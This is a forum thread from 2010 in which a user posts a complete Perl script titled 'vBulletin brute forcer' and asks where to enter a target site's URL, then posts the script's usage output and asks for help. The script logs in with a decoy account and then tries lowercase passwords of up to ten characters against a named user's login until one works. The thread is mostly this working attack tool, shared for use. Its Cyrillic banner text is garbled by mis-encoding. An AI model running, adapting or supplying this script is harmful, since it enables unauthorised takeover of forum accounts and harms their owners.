|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 88
Members: 0
Total: 88
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
vbcracker perl script help needed |
|
Posted: Sat Jan 30, 2010 3:31 pm |
|
|
magicmonkey |
Regular user |
|
|
Joined: Jan 21, 2010 |
Posts: 7 |
|
|
|
|
|
|
|
i have been trying to test the below script, could someone kindly tell me where I edit to put the website url in the script.
Thanks inadvance.
#!/usr/bin/perl
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);
$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars
print q(
################################################## #########
# vBulletin brute forcer #
# http://www.unnamedone.com #
# brian_denys@hotmail.com #
# 09 - April - 2008 #
################## Coded By UnnamedOne ####################
);
if (@ARGV < 4)
{
print " # ß ÃÃ¥ îòâå÷Ãþ çà ÷òî-Ãèáóäü, ÷òî âû óäîâëåòâîðÿåòåñü ñ ýòèì!\n";
print " # ÒåñòèðîâÃëîñü òîëüêî âåðñèÿõ vBulletin 3.6.8 and 3.7.0!\n";
print " # usage : vbrute.pl [host & path] [user] [pass] [target]\n";
print " # E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";
exit();
}
fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
crack($t);
}
sub fakelogin {
$xplr = LWP::UserAgent->new() or die;
$cookie_jarr = HTTP::Cookies->new();
$xplr->cookie_jar( $cookie_jarr );
$resr = $xplr->post($url.'login.php?do=login',
Content => [
"vb_login_username" => "$usern",
"vb_login_password" => "$passw",
"do" => "login",
],);
if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
#Do nothing..
}
else
{
#print $cookie_jarr->as_string;
print "Forum not vulnerable or wrong username / password.\n";
exit();
}
}
sub crack {
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++) {
$RawString[i] = 0;
}
$Start = gettimeofday();
do {
for (my $i =0;$i<$CharSet;$i++)
{
if ($RawString[$i] > length($alpha)-1) {
if ($i==$CharSet-1) {
$cnt = 0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret = "";
for (my $i =0;$i<$CharSet;$i++) {
$ret = $ret . substr($alpha,$RawString[$i],1);
}
$count++;
if($count == 4) {
fakelogin();
$count = 0;
}
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'login.php?do=login',
Content => [
"vb_login_username" => "$uname",
"vb_login_password" => "$ret",
"do" => "login",
],);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr) {
$cnt = int($cnt/$dbgtmr);
$Start = gettimeofday();
}
$logins++;
system("clear");
$pro = ($logins / ($charcount * $maxchars));
print "Current password: $ret\n";
print "Login attempts: $logins\n";
print "Cracking speed: $cnt passwords/sec\n";
print "$pro% finished.\n";
$cnt = 0;
if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
print "Password cracked! => $ret\n";
exit();
}
$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}
# |
|
|
|
|
|
|
|
|
Posted: Tue Feb 02, 2010 7:23 am |
|
|
magicmonkey |
Regular user |
|
|
Joined: Jan 21, 2010 |
Posts: 7 |
|
|
|
|
|
|
|
after running the script i get this message. but no hash or salt. any help?
################################################## #########
# vBulletin brute forcer #
# http://www.unnamedone.com #
# brian_denys@hotmail.com #
# 09 - April - 2008 #
################## Coded By UnnamedOne ####################
# ß ÃÃ¥ îòâå÷Ãþ çà ÷òî-Ãèáóäü, ÷òî âû óäîâëåòâîðÿåòåñü ñ ýòèì!
# ÒåñòèðîâÃëîñü òîëüêî âåðñèÿõ vBulletin 3.6.8 and 3.7.0!
# usage : vbrute.pl [host & path] [user] [pass] [target]
# E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|